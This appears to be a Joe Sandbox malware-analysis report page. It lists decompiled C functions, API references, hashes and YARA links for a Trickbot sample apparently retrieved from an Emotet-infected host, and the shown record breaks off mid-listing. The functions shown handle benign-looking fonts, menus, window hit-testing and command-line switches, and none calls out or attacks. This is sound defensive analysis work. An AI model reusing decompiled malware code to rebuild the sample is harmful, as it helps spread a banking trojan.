Associated: 00000000.00000002.254008311.00447000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.254017408.0044E000.00000002.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_2019-10-21-Trickbot-gtag-mor27-retreived-by-Emotet-infected-host.jbxd

Similarity

API ID: lstrcat$lstrcpylstrlenwsprintf$LongWindow
String ID: - $:%d
API String ID: 3078587954-2359489159
Opcode ID: ae8aacf59fbcbd5401ef4bd275cd5d505c81a2293181c0eb114b17a30bd14ef3
Instruction ID: 4dd73163ec7d7a262f117d5d3406d315a6e0ef4dc42e90b0c75c7a1bc7bf7c61
Opcode Fuzzy Hash: ae8aacf59fbcbd5401ef4bd275cd5d505c81a2293181c0eb114b17a30bd14ef3
Instruction Fuzzy Hash: 50215EB190031EABCF20BB65DD8CFDA7BACBB44304F108462BA55E3151D678EA45CF94

Uniqueness

Uniqueness Score: -1.00%

Function 00436460, Relevance: 19.6, APIs: 13, Instructions: 134
COMMON

Download Yara Rule

C-Code - Quality: 97%

			E00436460(intOrPtr* __ecx) {
				struct tagSIZE _v12;
				int _v16;
				struct tagSIZE _v24;
				void* _v28;
				int _v32;
				struct tagLOGFONTA _v92;
				struct tagTEXTMETRICA _v148;
				void* _t64;
				long _t70;
				void* _t79;
				signed int _t83;
				signed int _t84;
				void* _t91;
				int _t117;
				void* _t119;
				void** _t122;

				_t121 = __ecx;
				if( *(__ecx + 8) != 0) {
					_t64 =  *(__ecx + 0x2c);
					if(_t64 == 0) {
						_push(0xe);
						return  *((intOrPtr*)( *__ecx + 0x24))();
					}
					if( *((intOrPtr*)(__ecx + 4)) != 0) {
						GetObjectA(_t64, 0x3c,  &_v92);
						GetTextFaceA( *(__ecx + 8), 0x20,  &(_v92.lfFaceName));
						GetTextMetricsA( *(__ecx + 8),  &_v148);
						_t70 = _v148.tmHeight;
						if(_t70 >= 0) {
							_v92.lfHeight = _v148.tmInternalLeading - _t70;
						} else {
							_v92.lfHeight = _t70;
						}
						_v92.lfWidth = _v148.tmAveCharWidth;
						_v92.lfWeight = _v148.tmWeight;
						_v92.lfItalic = _v148.tmItalic;
						_v92.lfUnderline = _v148.tmUnderlined;
						_v92.lfStrikeOut = _v148.tmStruckOut;
						_v92.lfCharSet = _v148.tmCharSet;
						_v92.lfPitchAndFamily = _v148.tmPitchAndFamily;
						_t79 = CreateFontIndirectA( &_v92);
						_v28 = _t79;
						SelectObject( *(_t121 + 4), _t79);
						GetTextMetricsA( *(_t121 + 4),  &_v148);
						_t83 = _v148.tmHeight;
						_t117 =  ~(_v92.lfHeight);
						if(_t83 >= 0) {
							_t84 = _t83 - _v148.tmInternalLeading;
						} else {
							_t84 =  ~_t83;
						}
						_v16 = _t84;
						GetWindowExtEx( *(_t121 + 4),  &_v12);
						GetViewportExtEx( *(_t121 + 4),  &_v24);
						if(_v12.cy < 0) {
							_v12.cy =  ~(_v12.cy);
						}
						if(_v24.cy < 0) {
							_v24.cy =  ~(_v24.cy);
						}
						_v32 = MulDiv(_t117, _v24.cy, _v12.cy);
						if(_v32 >= MulDiv(_v16, _v24.cy, _v12.cy)) {
							_t119 = _v28;
						} else {
							_v92.lfFaceName = _v92.lfFaceName & 0x00000000;
							_v92.lfPitchAndFamily = (_v92.lfPitchAndFamily & 0 | (_v92.lfPitchAndFamily & 0x000000f0) != 0x00000050) - 0x00000001 & 0x00000050;
							_t119 = CreateFontIndirectA( &_v92);
							SelectObject( *(_t121 + 4), _t119);
							DeleteObject(_v28);
						}
						_t122 = _t121 + 0x28;
						_t91 = E00422700(_t122);
						 *_t122 = _t119;
						return _t91;
					}
				}
				return _t64;
			}

0x0043646a
0x00436470
0x00436476
0x0043647b
0x0043647f
0x00000000
0x00436481
0x0043648d
0x0043649c
0x004364ab
0x004364c1
0x004364c3
0x004364cb
0x004364da
0x004364cd
0x004364cd
0x004364cd
0x004364e6
0x004364ec
0x004364f2
0x004364f8
0x004364fe
0x00436504
0x0043650a
0x00436511
0x00436514
0x0043651a
0x0043652a
0x0043652f
0x00436535
0x00436539
0x0043653f
0x0043653b
0x0043653b
0x0043653b
0x00436545
0x0043654f
0x0043655c
0x00436566
0x0043656d
0x0043656d
0x00436574
0x0043657b
0x0043657b
0x00436590
0x0043659e
0x004365d2
0x004365a0
0x004365a3
0x004365b2
0x004365bb
0x004365c1
0x004365ca
0x004365ca
0x004365d5
0x004365d9
0x004365de
0x00000000
0x004365e1
0x0043648d
0x004365e4

APIs

GetObjectA.GDI32(?,0000003C,?), ref: 0043649C
GetTextFaceA.GDI32(00000000,00000020,?), ref: 004364AB
GetTextMetricsA.GDI32(00000000,?), ref: 004364C1
CreateFontIndirectA.GDI32(?), ref: 00436511
SelectObject.GDI32(00000000,00000000), ref: 0043651A
GetTextMetricsA.GDI32(00000000,?), ref: 0043652A
GetWindowExtEx.GDI32(00000000,00000000), ref: 0043654F
GetViewportExtEx.GDI32(00000000,?), ref: 0043655C
MulDiv.KERNEL32(?,00000000,00000000), ref: 0043658B
MulDiv.KERNEL32(?,00000000,00000000), ref: 00436599
CreateFontIndirectA.GDI32(?), ref: 004365B9

Memory Dump Source

Source File: 00000000.00000002.253939010.00401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.253932686.00400000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.253994298.00439000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.254008311.00447000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.254017408.0044E000.00000002.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_2019-10-21-Trickbot-gtag-mor27-retreived-by-Emotet-infected-host.jbxd

Similarity

API ID: Text$CreateFontIndirectMetricsObject$FaceSelectViewportWindow
String ID:
API String ID: 3870699365-0
Opcode ID: 93f3913775e0e2bd4684e3c02a016076f5a16590feaf4255d8edee53c4cd0bb8
Instruction ID: d9bbd871c1efa42dcf5c24b6303bed0624cdd6504f943b67eccbbb98aca6ccf1
Opcode Fuzzy Hash: 93f3913775e0e2bd4684e3c02a016076f5a16590feaf4255d8edee53c4cd0bb8
Instruction Fuzzy Hash: 32514331C0025AEFDF21CFE9D845AEEBBB8AF08300F14806AE456A7265D3749A46DF14

Uniqueness

Uniqueness Score: -1.00%

Function 00413AC0, Relevance: 19.3, APIs: 9, Strings: 2, Instructions: 52
libraryloaderCOMMON

Download Yara Rule

C-Code - Quality: 87%

			E00413AC0(intOrPtr _a4, intOrPtr _a8) {
				_Unknown_base(*)()* _v4;
				_Unknown_base(*)()* _t8;
				signed int _t9;
				signed short _t19;
				intOrPtr _t21;

				if(_a8 == 1) {
					_t8 = GetProcAddress(GetModuleHandleA("KERNEL32.DLL"), "DisableThreadLibraryCalls");
					_t21 = _a4;
					_v4 = _t8;
					if(_t8 != 0) {
						_v4(_t21);
					}
					EnterCriticalSection(0x44d320);
					 *0x44d35c = _t21;
					 *0x44d358 = _t21;
					_t9 = GetVersion();
					_t19 = (_t9 & 0x000000ff) << 0x00000008 | _t9 & 0x000000ff;
					 *0x44d360 = _t19;
					if((_t9 & 0x80000000) == 0) {
						L5:
						 *0x44d362 = 0x20;
					} else {
						 *0x44d362 = 0x10;
						if(_t19 >= 0x35f) {
							goto L5;
						}
					}
					 *0x44de34 = GetSystemMetrics(7) - 1;
					 *0x44de38 = GetSystemMetrics(8) - 1;
					 *0x44de3c = GetSystemMetrics(4);
					 *0x44de40 = GetSystemMetrics(0x1e);
					LeaveCriticalSection(0x44d320);
				}
				return 1;
			}

0x00413ac9
0x00413ae0
0x00413ae6
0x00413aea
0x00413af0
0x00413af3
0x00413af3
0x00413afc
0x00413b02
0x00413b08
0x00413b0e
0x00413b20
0x00413b28
0x00413b2f
0x00413b41
0x00413b41
0x00413b31
0x00413b31
0x00413b3f
0x00000000
0x00000000
0x00413b3f
0x00413b57
0x00413b61
0x00413b6a
0x00413b76
0x00413b7b
0x00413b7b
0x00413b8a

APIs

GetModuleHandleA.KERNEL32(KERNEL32.DLL,?), ref: 00413AD4
GetProcAddress.KERNEL32(00000000,DisableThreadLibraryCalls), ref: 00413AE0
EnterCriticalSection.KERNEL32(0044D320), ref: 00413AFC
GetVersion.KERNEL32 ref: 00413B0E
GetSystemMetrics.USER32(00000007), ref: 00413B52
GetSystemMetrics.USER32(00000008), ref: 00413B5C
GetSystemMetrics.USER32(00000004), ref: 00413B66
GetSystemMetrics.USER32(0000001E), ref: 00413B6F
LeaveCriticalSection.KERNEL32(0044D320), ref: 00413B7B

Strings

KERNEL32.DLL, xrefs: 00413ACF
DisableThreadLibraryCalls, xrefs: 00413ADA

Memory Dump Source

Source File: 00000000.00000002.253939010.00401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.253932686.00400000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.253994298.00439000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.254008311.00447000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.254017408.0044E000.00000002.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_2019-10-21-Trickbot-gtag-mor27-retreived-by-Emotet-infected-host.jbxd

Similarity

API ID: MetricsSystem$CriticalSection$AddressEnterHandleLeaveModuleProcVersion
String ID: DisableThreadLibraryCalls$KERNEL32.DLL
API String ID: 1414939872-3863293605
Opcode ID: bf8847e3d2f707688648f7e0ecd3ff4510742e97c87c4d8970bd3ceb6e8b9f61
Instruction ID: 53e69021af04aa894e7cea32da7e39c2029532202f54e618df31dd379534d76f
Opcode Fuzzy Hash: bf8847e3d2f707688648f7e0ecd3ff4510742e97c87c4d8970bd3ceb6e8b9f61
Instruction Fuzzy Hash: 84117078D50714ABDB10AF64AC0979B3BA0FB06701F54447AED459B2A0D7B99848CF4E

Uniqueness

Uniqueness Score: -1.00%

Function 0042F64D, Relevance: 18.3, APIs: 12, Instructions: 288
keyboardCOMMON

Download Yara Rule

C-Code - Quality: 83%

			E0042F64D(intOrPtr __ecx, struct tagPOINT _a4, intOrPtr _a8) {
				signed char _v6;
				signed int _v7;
				signed int _v8;
				signed int _v12;
				intOrPtr _v16;
				intOrPtr _v20;
				signed int _v28;
				struct tagRECT _v44;
				struct tagRECT _v60;
				struct tagRECT _v112;
				intOrPtr _t141;
				void* _t144;
				intOrPtr _t145;
				intOrPtr _t148;
				void* _t150;
				signed int _t151;
				void* _t161;
				int _t177;
				void* _t184;
				signed int _t188;
				void* _t190;
				signed int _t194;
				void* _t196;
				void* _t198;
				signed int _t205;
				int _t206;
				void* _t219;
				intOrPtr _t238;
				intOrPtr _t241;
				int _t243;
				signed int _t245;
				signed int _t246;
				int _t251;

				_t241 = __ecx;
				_v16 = __ecx;
				_v8 = E0041B66F(__ecx);
				GetWindowRect( *(__ecx + 0x1c),  &_v44);
				_t205 = GetSystemMetrics(0x21);
				_v12 = _t205;
				_v28 = GetSystemMetrics(0x20);
				if( *0x44b35c != 0) {
					_t177 = E004187B4(_t241);
					_t251 = _t177;
					_t243 = 2;
					if( *0x44b354 == 0 || (_v7 & 0x00000010) == 0) {
						L6:
						if(_t251 < 0xa || _t251 > 0x11) {
							if(_t251 != 4) {
								goto L17;
							}
							goto L9;
						} else {
							L9:
							if((_v7 & 0x00000008) == 0) {
								InflateRect( &_v44,  ~_v28,  ~_t205);
								if((_v7 & 0x00000002) == 0) {
									L17:
									return _t251;
								}
								_t184 = _t251 - 4;
								if(_t184 == 0) {
									L22:
									_t188 = (0 | _a8 - _v44.bottom <= 0x00000000) - 0x00000001 & 0x00000004;
									L23:
									return _t188 + 0xb;
								}
								_t190 = _t184 - 9;
								if(_t190 == 0) {
									_t194 = (0 | _a8 - _v44.top >= 0x00000000) - 0x00000001 & _t243;
									L19:
									return _t194 + 0xa;
								}
								_t196 = _t190 - 1;
								if(_t196 == 0) {
									_t188 = 0 | _a8 - _v44.top < 0x00000000;
									goto L23;
								}
								_t198 = _t196 - _t243;
								if(_t198 == 0) {
									_t194 = (0 | _a8 - _v44.bottom <= 0x00000000) - 0x00000001 & 0x00000005;
									goto L19;
								}
								if(_t198 == 1) {
									goto L22;
								}
								goto L17;
							}
							return _t243;
						}
					} else {
						if(_t251 == 3) {
							_t251 = _t243;
						}
						if(GetKeyState(_t243) < 0) {
							L25:
							return 0;
						} else {
							goto L6;
						}
					}
				}
				_push(_a8);
				if(PtInRect( &_v44, _a4.x) == 0) {
					goto L25;
				}
				_t206 = GetSystemMetrics(6);
				_v20 = _t206;
				_t245 = GetSystemMetrics(5);
				_v112.top = _v44.top;
				_v112.left = _v44.left;
				_v112.bottom = _v44.bottom;
				_v112.right = _v44.right;
				_push( &_v112);
				E0042F5E7(0);
				CopyRect( &_v60,  &_v112);
				_push(_a8);
				if(PtInRect( &_v60, _a4.x) != 0) {
					_push(1);
					L61:
					_pop(_t144);
					return _t144;
				}
				if((_v8 & 0x00040600) == 0) {
					L56:
					_t141 =  *0x44b72c; // 0x0
					_push(_a8);
					_v44.bottom = _t206 + _t141 + _v44.top;
					if(PtInRect( &_v44, _a4.x) == 0) {
						_push(0xfffffffe);
						goto L61;
					}
					_t145 =  *0x44b728; // 0x0
					if(_a4.x >= _t145 + _v44.left - 2 || (_v6 & 0x00000008) == 0) {
						L54:
						_push(2);
					} else {
						_push(3);
					}
					goto L61;
				}
				_t246 = _v12;
				_t148 =  *0x44b728; // 0x0
				_t150 = _t148 - _t245 + _t245 * 2 + _v28;
				_t219 = _t246 - _t206 + _t206 +  *0x44b72c;
				if(_a8 >= _v44.top + _t246) {
					_t238 = _v44.bottom;
					if(_a8 < _t238 - _t246) {
						_t151 = _v28;
						if(_a4.x >= _v44.left + _t151) {
							if(_a4.x < _v44.right - _t151) {
								InflateRect( &_v44,  ~_t151,  ~_v12);
								_t206 = _v20;
								goto L56;
							}
							if((_v7 & 0x00000002) == 0) {
								if(_a8 > _v44.top + _t219) {
									_t161 = ((0 | _a8 - _t238 - _t219 < 0x00000000) - 0x00000001 & 0x00000006) + 0xb;
								} else {
									_push(0xe);
									goto L51;
								}
							} else {
								_push(0xb);
								goto L51;
							}
						} else {
							if((_v7 & 0x00000002) == 0) {
								if(_a8 <= _v44.top + _t219) {
									goto L33;
								} else {
									_t161 = ((0 | _a8 - _t238 - _t219 < 0x00000000) - 0x00000001 & 0x00000006) + 0xa;
								}
							} else {
								_push(0xa);
								goto L51;
							}
						}
					} else {
						if((_v7 & 0x00000002) == 0) {
							if(_a4.x > _v44.left + _t150) {
								_t161 = ((0 | _a4.x - _v44.right - _t150 < 0x00000000) - 0x00000001 & 0x00000002) + 0xf;
							} else {
								_push(0x10);
								goto L51;
							}
						} else {
							_push(0xf);
							goto L51;
						}
					}
				} else {
					if((_v7 & 0x00000002) == 0) {
						if(_a4.x > _v44.left + _t150) {
							_t161 = ((0 | _a4 - _v44.right - _t150 < 0x00000000) - 0x00000001 & 0x00000002) + 0xc;
						} else {
							L33:
							_push(0xd);
							goto L51;
						}
					} else {
						_push(0xc);
						L51:
						_pop(_t161);
					}
				}
				if((_v7 & 0x00000008) != 0) {
					goto L54;
				}
				return _t161;
			}

0x0042f656
0x0042f658
0x0042f660
0x0042f66a
0x0042f67a
0x0042f67e
0x0042f68a
0x0042f68d
0x0042f695
0x0042f6a3
0x0042f6a5
0x0042f6a6
0x0042f6c5
0x0042f6c8
0x0042f6d2
0x00000000
0x00000000
0x00000000
0x0042f6d4
0x0042f6d4
0x0042f6d8
0x0042f6ee
0x0042f6f8
0x0042f710
0x00000000
0x0042f710
0x0042f6fc
0x0042f6ff
0x0042f74b
0x0042f757
0x0042f75a
0x00000000
0x0042f75a
0x0042f701
0x0042f704
0x0042f747
0x0042f726
0x00000000
0x0042f726
0x0042f706
0x0042f707
0x0042f736
0x00000000
0x0042f736
0x0042f709
0x0042f70b
0x0042f723
0x00000000
0x0042f723
0x0042f70e
0x00000000
0x00000000
0x00000000
0x0042f70e
0x00000000
0x0042f6da
0x0042f6ae
0x0042f6b1
0x0042f6b3
0x0042f6b3
0x0042f6bf
0x0042f778
0x00000000
0x00000000
0x00000000
0x00000000
0x0042f6bf
0x0042f6a6
0x0042f762
0x0042f776
0x00000000
0x00000000
0x0042f783
0x0042f787
0x0042f78c
0x0042f791
0x0042f797
0x0042f7a0
0x0042f7a6
0x0042f7ac
0x0042f7af
0x0042f7bc
0x0042f7c2
0x0042f7d0
0x0042f7d2
0x0042f944
0x0042f944
0x00000000
0x0042f944
0x0042f7e0
0x0042f90a
0x0042f90a
0x0042f90f
0x0042f91e
0x0042f925
0x0042f942
0x00000000
0x0042f942
0x0042f927
0x0042f936
0x0042f8f0
0x0042f8f0
0x0042f93e
0x0042f93e
0x0042f93e
0x00000000
0x0042f936
0x0042f7e9
0x0042f7ee
0x0042f7f8
0x0042f804
0x0042f80f
0x0042f848
0x0042f852
0x0042f885
0x0042f88d
0x0042f8be
0x0042f901
0x0042f907
0x00000000
0x0042f907
0x0042f8c4
0x0042f8d2
0x0042f8e7
0x0042f8d4
0x0042f8d4
0x00000000
0x0042f8d4
0x0042f8c6
0x0042f8c6
0x00000000
0x0042f8c6
0x0042f88f
0x0042f893
0x0042f8a1
0x00000000
0x0042f8a3
0x0042f8b1
0x0042f8b1
0x0042f895
0x0042f895
0x00000000
0x0042f895
0x0042f893
0x0042f854
0x0042f858
0x0042f866
0x0042f87d
0x0042f868
0x0042f868
0x00000000
0x0042f868
0x0042f85a
0x0042f85a
0x00000000
0x0042f85a
0x0042f858
0x0042f811
0x0042f815
0x0042f826
0x0042f840
0x0042f828
0x0042f828
0x0042f828
0x00000000
0x0042f828
0x0042f817
0x0042f817
0x0042f8d6
0x0042f8d6
0x0042f8d6
0x0042f815
0x0042f8ee
0x00000000
0x00000000
0x0042f949

APIs

Part of subcall function 0041B66F: GetWindowLongA.USER32(?,000000F0), ref: 0041B67B

GetWindowRect.USER32(?,?), ref: 0042F66A
GetSystemMetrics.USER32(00000021), ref: 0042F678
GetSystemMetrics.USER32(00000020), ref: 0042F681
GetKeyState.USER32(00000002), ref: 0042F6B6
InflateRect.USER32(?,?,00000000), ref: 0042F6EE
PtInRect.USER32(?,?,?), ref: 0042F772

Memory Dump Source

Source File: 00000000.00000002.253939010.00401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.253932686.00400000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.253994298.00439000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.254008311.00447000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.254017408.0044E000.00000002.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_2019-10-21-Trickbot-gtag-mor27-retreived-by-Emotet-infected-host.jbxd

Similarity

API ID: Rect$MetricsSystemWindow$InflateLongState
String ID:
API String ID: 90034188-0
Opcode ID: 51c60695f28d3e6aa7571b0be85ac81139f351f48d2ff465e61c3390eab60846
Instruction ID: 90746cf88f7eb0170c70459fb27df5aac318e4175263f4fec58a5719fc0ffb12
Opcode Fuzzy Hash: 51c60695f28d3e6aa7571b0be85ac81139f351f48d2ff465e61c3390eab60846
Instruction Fuzzy Hash: 0CA17432B0022DABDF04DFA8D945BEEB7B5EF48354F94803AD802E7240D7789985CB59

Uniqueness

Uniqueness Score: -1.00%

Function 004317EC, Relevance: 18.1, APIs: 7, Strings: 5, Instructions: 66
stringCOMMON

Download Yara Rule

C-Code - Quality: 100%

			E004317EC(void* __ecx, CHAR* _a4) {
				int _t10;
				int _t11;
				int _t12;
				int _t15;
				void* _t16;
				void* _t17;
				CHAR* _t18;
				void* _t21;

				_t18 = _a4;
				_t21 = __ecx;
				_t10 = lstrcmpA(_t18, "pt");
				if(_t10 == 0) {
					 *((intOrPtr*)(_t21 + 0x10)) = 3;
					return _t10;
				}
				_t11 = lstrcmpA(_t18, "p");
				if(_t11 == 0) {
					 *((intOrPtr*)(_t21 + 0x10)) = 2;
					return _t11;
				}
				_t12 = lstrcmpiA(_t18, "Unregister");
				if(_t12 == 0) {
					L13:
					 *((intOrPtr*)(_t21 + 0x10)) = 5;
					return _t12;
				}
				_t12 = lstrcmpiA(_t18, "Unregserver");
				if(_t12 == 0) {
					goto L13;
				}
				if(lstrcmpA(_t18, "dde") == 0) {
					_t17 = E0042F1B5(_t13);
					 *((intOrPtr*)(_t21 + 0x10)) = 4;
					return _t17;
				}
				if(lstrcmpiA(_t18, "Embedding") == 0) {
					_t16 = E0042F1B5(_t14);
					 *((intOrPtr*)(_t21 + 8)) = 1;
					L12:
					 *(_t21 + 4) =  *(_t21 + 4) & 0x00000000;
					return _t16;
				}
				_t15 = lstrcmpiA(_t18, "Automation");
				if(_t15 == 0) {
					_t16 = E0042F1B5(_t15);
					 *((intOrPtr*)(_t21 + 0xc)) = 1;
					goto L12;
				}
				return _t15;
			}

0x004317ed
0x004317ff
0x00431802
0x00431806
0x00431808
0x00000000
0x00431808
0x0043181a
0x0043181e
0x00431820
0x00000000
0x00431820
0x00431835
0x00431839
0x0043189c
0x0043189c
0x00000000
0x0043189c
0x00431841
0x00431845
0x00000000
0x00000000
0x00431851
0x00431854
0x00431859
0x00000000
0x00431859
0x0043186c
0x0043186f
0x00431874
0x00431896
0x00431896
0x00000000
0x00431896
0x00431883
0x00431887
0x0043188a
0x0043188f
0x00000000
0x0043188f
0x004318a7

APIs

lstrcmpA.KERNEL32(00000000,0043D134,?,?,?,?,004317D6,00000000), ref: 00431802
lstrcmpA.KERNEL32(00000000,0043D130,?,?,?,?,004317D6,00000000), ref: 0043181A

Strings

Embedding, xrefs: 00431862
Unregister, xrefs: 0043182F
Unregserver, xrefs: 0043183B
dde, xrefs: 00431847
Automation, xrefs: 0043187D

Memory Dump Source

Source File: 00000000.00000002.253939010.00401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.253932686.00400000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.253994298.00439000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.254008311.00447000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.254017408.0044E000.00000002.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_2019-10-21-Trickbot-gtag-mor27-retreived-by-Emotet-infected-host.jbxd

Similarity

API ID: lstrcmp
String ID: Automation$Embedding$Unregister$Unregserver$dde
API String ID: 1534048567-1842294661
Opcode ID: 1deb10844dd2b1421f30f222f33fd058582486318deb9182688de6430cd8e9f4
Instruction ID: b7e7393ecc2181a3e13577f938f94a09214861f866a96aedcd350486add8f0ed
Opcode Fuzzy Hash: 1deb10844dd2b1421f30f222f33fd058582486318deb9182688de6430cd8e9f4
Instruction Fuzzy Hash: 3E11A0E2A00302A7DA247B72EC45F2776AC9F4C758F50793BA80292252DBFDD8054A6C

Uniqueness

Uniqueness Score: -1.00%

Function 0041E5B4, Relevance: 17.7, APIs: 8, Strings: 2, Instructions: 194
windowstringCOMMON

Download Yara Rule

C-Code - Quality: 87%

			E0041E5B4(void* __ecx) {
				char _t92;
				signed int _t94;
				int _t98;
				int _t101;
				signed int _t105;
				CHAR* _t106;
				signed int _t109;
				void* _t117;
				CHAR** _t119;
				intOrPtr* _t139;
				void* _t141;
				signed int _t142;
				intOrPtr _t143;
				CHAR* _t148;
				CHAR* _t153;
				signed int _t155;
				signed int _t166;
				signed char _t171;
				signed int _t172;
				void* _t176;
				CHAR* _t179;
				void* _t181;
				void* _t183;
				void* _t184;

				E00405340(E00438858, _t181);
				_t184 = _t183 - 0x124;
				_t179 =  *(_t181 + 8);
				_t176 = __ecx;
				_t92 = _t179[0xc];
				_t139 = __ecx + 0x1c;
				 *(_t181 - 0x18) = _t92;
				if( *((intOrPtr*)( *((intOrPtr*)(__ecx + 0x1c)) - 8)) == 0) {
					_t187 = _t92;
					if(_t92 != 0) {
						 *(_t181 + 8) = _t179[4];
						GetMenuStringA( *( *(_t181 - 0x18) + 4),  *(_t181 + 8), E004181F7(_t139, _t181, 0x100), 0x100, 0);
						E00418246(_t139, _t187, 0xffffffff);
					}
				}
				_t94 = 0;
				if( *((intOrPtr*)( *((intOrPtr*)( *((intOrPtr*)(_t176 + 8)))) - 8)) != 0) {
					__eflags = _t179[0xc];
					if(_t179[0xc] == 0) {
						goto L23;
					}
					_t141 = 0;
					__eflags =  *(_t176 + 4);
					if( *(_t176 + 4) <= 0) {
						L10:
						GetCurrentDirectoryA(0x104, _t181 - 0x130);
						_t98 = lstrlenA(_t181 - 0x130);
						_t148 =  *0x447478; // 0x44748c
						 *((char*)(_t181 + _t98 - 0x130)) = 0x5c;
						 *(_t181 + _t98 - 0x12f) =  *(_t181 + _t98 - 0x12f) & 0x00000000;
						_t99 = _t98 + 1;
						 *(_t181 - 0x18) = _t98 + 1;
						 *(_t181 - 0x14) = _t148;
						_t142 = 0;
						 *(_t181 - 0x10) = _t148;
						 *(_t181 - 4) = 0;
						__eflags =  *(_t176 + 4);
						 *(_t181 - 4) = 1;
						if( *(_t176 + 4) <= 0) {
							L22:
							_t179[8] = _t179[8] - 1;
							_t101 = GetMenuItemCount( *(_t179[0xc] + 4));
							 *(_t181 - 4) =  *(_t181 - 4) & 0x00000000;
							_t179[0x20] = _t101;
							_t179[0x18] = 1;
							E00417EC8(_t181 - 0x10);
							_t86 = _t181 - 4;
							 *_t86 =  *(_t181 - 4) | 0xffffffff;
							__eflags =  *_t86;
							_t94 = E00417EC8(_t181 - 0x14);
							goto L23;
						}
						while(1) {
							_t105 = E0041E4AE(_t176, _t181 - 0x14, _t142, _t181 - 0x130, _t99, 1);
							__eflags = _t105;
							if(_t105 == 0) {
								goto L22;
							}
							_t106 =  *(_t181 - 0x14);
							 *(_t181 + 8) = _t106;
							__eflags =  *((intOrPtr*)(_t106 - 8)) +  *((intOrPtr*)(_t106 - 8));
							_t109 = E004181F7(_t181 - 0x10, _t181,  *((intOrPtr*)(_t106 - 8)) +  *((intOrPtr*)(_t106 - 8)));
							_t153 =  *(_t181 + 8);
							while(1) {
								_t166 =  *_t153;
								__eflags = _t166;
								if(__eflags == 0) {
									break;
								}
								__eflags = _t166 - 0x26;
								if(_t166 == 0x26) {
									 *_t109 = _t166;
									_t109 = _t109 + 1;
									__eflags = _t109;
								}
								_t171 =  *_t153;
								 *(_t181 + 0xb) = _t171;
								_t172 = _t171 & 0x000000ff;
								__eflags =  *(_t172 + 0x44d1e1) & 0x00000004;
								if(( *(_t172 + 0x44d1e1) & 0x00000004) != 0) {
									 *_t109 =  *(_t181 + 0xb);
									_t109 = _t109 + 1;
									_t153 =  &(_t153[1]);
									__eflags = _t153;
								}
								 *_t109 =  *_t153;
								_t109 = _t109 + 1;
								_t153 =  &(_t153[1]);
							}
							 *_t109 =  *_t109 & 0x00000000;
							E00418246(_t181 - 0x10, __eflags, 0xffffffff);
							_t155 = 0xa;
							_push(( *((intOrPtr*)(_t176 + 0x14)) + _t142 + 1) % _t155);
							wsprintfA(_t181 - 0x2c, "&%d ");
							_t184 = _t184 + 0xc;
							_t117 = E00417F36(_t181 - 0x20, _t181, _t181 - 0x2c);
							 *(_t181 - 4) = 2;
							_push(_t181 - 0x10);
							_push(_t117);
							_push(_t181 - 0x1c);
							_t119 = E0041806A(_t181 - 0x10, __eflags);
							_t158 = _t179[8];
							 *(_t181 + 8) =  *_t119;
							_t121 = _t179[4];
							_t67 = _t158 + 1; // 0x1
							_t179[8] = _t67;
							_t69 = _t121 + 1; // 0x3
							_t179[4] = _t69;
							InsertMenuA( *(_t179[0xc] + 4), _t179[8], 0x400, _t179[4],  *(_t181 + 8));
							E00417EC8(_t181 - 0x1c);
							 *(_t181 - 4) = 1;
							E00417EC8(_t181 - 0x20);
							_t142 = _t142 + 1;
							__eflags = _t142 -  *(_t176 + 4);
							if(_t142 <  *(_t176 + 4)) {
								_t99 =  *(_t181 - 0x18);
								continue;
							}
							goto L22;
						}
						goto L22;
					} else {
						goto L9;
					}
					do {
						L9:
						DeleteMenu( *(_t179[0xc] + 4), _t179[4] + _t141, 0);
						_t141 = _t141 + 1;
						__eflags = _t141 -  *(_t176 + 4);
					} while (_t141 <  *(_t176 + 4));
					goto L10;
				} else {
					_t143 =  *_t139;
					if( *((intOrPtr*)(_t143 - 8)) != 0) {
						 *((intOrPtr*)( *_t179 + 0xc))(_t143);
					}
					_t94 =  *( *_t179)(0);
					L23:
					 *[fs:0x0] =  *((intOrPtr*)(_t181 - 0xc));
					return _t94;
				}
			}

0x0041e5b9
0x0041e5be
0x0041e5c6
0x0041e5ca
0x0041e5cf
0x0041e5d2
0x0041e5d5
0x0041e5dc
0x0041e5de
0x0041e5e0
0x0041e5e7
0x0041e602
0x0041e60c
0x0041e60c
0x0041e5e0
0x0041e616
0x0041e61b
0x0041e639
0x0041e63c
0x00000000
0x00000000
0x0041e642
0x0041e644
0x0041e647
0x0041e663
0x0041e66f
0x0041e67c
0x0041e682
0x0041e688
0x0041e690
0x0041e698
0x0041e699
0x0041e69c
0x0041e69f
0x0041e6a1
0x0041e6a4
0x0041e6a7
0x0041e6aa
0x0041e6ae
0x0041e7b3
0x0041e7b6
0x0041e7bc
0x0041e7c2
0x0041e7c9
0x0041e7cc
0x0041e7d3
0x0041e7d8
0x0041e7d8
0x0041e7d8
0x0041e7df
0x00000000
0x0041e7df
0x0041e6b9
0x0041e6ca
0x0041e6cf
0x0041e6d1
0x00000000
0x00000000
0x0041e6d7
0x0041e6dd
0x0041e6e3
0x0041e6e6
0x0041e6eb
0x0041e6ee
0x0041e6ee
0x0041e6f0
0x0041e6f2
0x00000000
0x00000000
0x0041e6f4
0x0041e6f7
0x0041e6f9
0x0041e6fb
0x0041e6fb
